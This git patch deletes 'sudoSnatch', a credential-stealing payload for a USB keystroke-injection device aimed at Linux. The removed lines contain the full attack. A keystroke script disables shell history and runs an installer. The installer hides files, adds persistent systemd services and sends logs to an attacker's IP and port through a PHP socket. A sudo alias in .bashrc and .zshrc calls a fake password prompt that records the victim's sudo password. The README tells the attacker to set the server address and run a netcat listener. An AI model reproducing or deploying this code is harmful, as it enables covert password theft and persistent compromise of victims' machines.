From 6a0d5e83fd78957d0b0717bc8363945bd560275e Mon Sep 17 00:00:00 2001 From: drapl0n <87269662+drapl0n@users.noreply.github.com> Date: Tue, 22 Mar 2022 21:03:40 +0530 Subject: [PATCH] deleting sudoSnatch --- .../library/credentials/sudoSnatch/README.md | 48 ---------------- .../library/credentials/sudoSnatch/payload.sh | 23 -------- .../credentials/sudoSnatch/payload.txt | 56 ------------------- payloads/library/credentials/sudoSnatch/shell | 12 ---- .../library/credentials/sudoSnatch/systemMgr | 5 -- 5 files changed, 144 deletions(-) delete mode 100644 payloads/library/credentials/sudoSnatch/README.md delete mode 100644 payloads/library/credentials/sudoSnatch/payload.sh delete mode 100644 payloads/library/credentials/sudoSnatch/payload.txt delete mode 100644 payloads/library/credentials/sudoSnatch/shell delete mode 100644 payloads/library/credentials/sudoSnatch/systemMgr diff --git a/payloads/library/credentials/sudoSnatch/README.md b/payloads/library/credentials/sudoSnatch/README.md deleted file mode 100644 index 060c1db1..00000000 --- a/payloads/library/credentials/sudoSnatch/README.md +++ /dev/null @@ -1,48 +0,0 @@ -## About: -* Title: sudoSnatch -* Description: sudoSnatch grabs plain text passwords remotely/locally. -* AUTHOR: drapl0n -* Version: 1.0 -* Category: Credentials -* Target: Unix-like operating systems with systemd. -* Attackmodes: HID, Storage - -## sudoSnatch: sudoSnatch payload grabs sudo password in plain text(imediately after victim uses `sudo` command) and sends it back to attacker remotely/locally. - -### Features: -* Plain text passwords. -* Detailed password logs. -* Persistent -* Autostart payload on boot. - -### Workflow: -* Injecting payload on target's system. -* Checks whether internet is connected to the target system. -* If internet is connected then it sends clear text passwords to attacker. - -### Changes to be made in payload.sh: -* Replace ip(0.0.0.0) and port number(4444) with your servers ip address and port number on line no `10`. -* Increase/Decrease time interval to restart service periodically (Default is 15 mins), on line no `14`. - -### LED Status: -* `SETUP` : MAGENTA -* `ATTACK` : YELLOW -* `FINISH` : GREEN - -### Directory Structure of payload components: -| FileName | Directory | -| -------------- | ----------------------------- | -| payload.txt | /payloads/switch1/ | -| payload.sh | /payloads/ | -| shell | /payloads/library/sudoSnatch/ | -| systemMgr | /payloads/library/sudoSnatch/ | - -* Note: Create directory named `sudoSnatch` in `/payloads/library/` -### Usage: -1. Inject payload into target's system. -2. Start netcat listner on attacking system: - -* `nc -l -p ` use this command to fetch passwords. - -#### Support me if you like my work: -* https://twitter.com/drapl0n diff --git a/payloads/library/credentials/sudoSnatch/payload.sh b/payloads/library/credentials/sudoSnatch/payload.sh deleted file mode 100644 index a11c2654..00000000 --- a/payloads/library/credentials/sudoSnatch/payload.sh +++ /dev/null @@ -1,23 +0,0 @@ -#!/bin/bash -unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE -mkdir /var/tmp/.system -lol=$(lsblk | grep 1.8G) -disk=$(echo $lol | awk '{print $1}') -mntt=$(lsblk | grep $disk | awk '{print $7}') -cp -r $mntt/payloads/library/sudoSnatch/systemMgr /var/tmp/.system/ -chmod +x /var/tmp/.system/systemMgr -touch /var/tmp/.system/sysLog -echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"cat /var/tmp/.system/sysLog "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus -chmod +x /var/tmp/.system/systemBus -mkdir -p ~/.config/systemd/user -echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/systemBUS.service -echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot -chmod +x /var/tmp/.system/reboot -echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/reboot.service -systemctl --user daemon-reload -systemctl --user enable --now systemBUS.service -systemctl --user start --now systemBUS.service -systemctl --user enable --now reboot.service -systemctl --user start --now reboot.service -cp -r $mntt/payloads/library/sudoSnatch/shell /tmp/ -chmod +x /tmp/shell && /tmp/./shell && rm /tmp/shell diff --git a/payloads/library/credentials/sudoSnatch/payload.txt b/payloads/library/credentials/sudoSnatch/payload.txt deleted file mode 100644 index 894b67c6..00000000 --- a/payloads/library/credentials/sudoSnatch/payload.txt +++ /dev/null @@ -1,56 +0,0 @@ -# Title: sudoSnatch -# Description: sudoSnatch grabs plain text passwords remotely/locally. -# AUTHOR: drapl0n -# Version: 1.0 -# Category: Credentials -# Target: Unix-like operating systems with systemd. -# Attackmodes: HID, Storage - -LED SETUP -ATTACKMODE STORAGE HID -GET SWITCH_POSITION -LED ATTACK -Q DELAY 1000 -Q CTRL-ALT t -Q DELAY 1000 - -# [Prevent storing history] -Q STRING unset HISTFILE -Q ENTER -Q DELAY 200 - -# [Fetching BashBunny's block device] -Q STRING lol='$(lsblk | grep 1.8G)' -Q ENTER -Q DELAY 100 -Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)'' -Q ENTER -Q DELAY 200 - -# [Mounting BashBunny] -Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp -Q ENTER -Q DELAY 1400 -Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)'' -Q ENTER -Q DELAY 200 - -# [transfering payload script] -Q STRING cp -r '$mntt'/payloads/payload.sh /tmp/ -Q ENTER -Q STRING chmod +x /tmp/payload.sh -Q ENTER -Q STRING /tmp/./payload.sh -Q ENTER -Q DELAY 5000 -Q STRING rm /tmp/payload.sh -Q ENTER -Q DELAY 500 - -# [Unmounting BashBunny] -Q STRING udisksctl unmount -b /dev/'$disk' -Q ENTER -Q DELAY 500 -Q STRING exit -Q ENTER -LED FINISH diff --git a/payloads/library/credentials/sudoSnatch/shell b/payloads/library/credentials/sudoSnatch/shell deleted file mode 100644 index eb95bf5d..00000000 --- a/payloads/library/credentials/sudoSnatch/shell +++ /dev/null @@ -1,12 +0,0 @@ -#!/bin/bash -ls -a ~/ | grep 'zshrc' &> /dev/null -if [ $? = 0 ]; then - echo -e "alias sudo='bash /var/tmp/.system/systemMgr && sudo'" >> ~/.zshrc - echo "systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service && systemctl --user restart reboot.service" >> ~/.zshrc -fi - -ls -a ~/ | grep 'bashrc' &> /dev/null -if [ $? = 0 ]; then - echo -e "alias sudo='bash /var/tmp/.system/systemMgr && sudo'" >> ~/.bashrc - echo "systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service && systemctl --user restart reboot.service" >> ~/.bashrc -fi diff --git a/payloads/library/credentials/sudoSnatch/systemMgr b/payloads/library/credentials/sudoSnatch/systemMgr deleted file mode 100644 index 36c6b4ea..00000000 --- a/payloads/library/credentials/sudoSnatch/systemMgr +++ /dev/null @@ -1,5 +0,0 @@ -#!/bin/bash -echo -n "[sudo] password for $(whoami):" -IFS="" read -s pass -echo -e "Timestamp=[$(date)] \t User=[$(whoami)] \t Password=[$pass]" >> /var/tmp/.system/sysLog -echo -e "\nSorry, try again."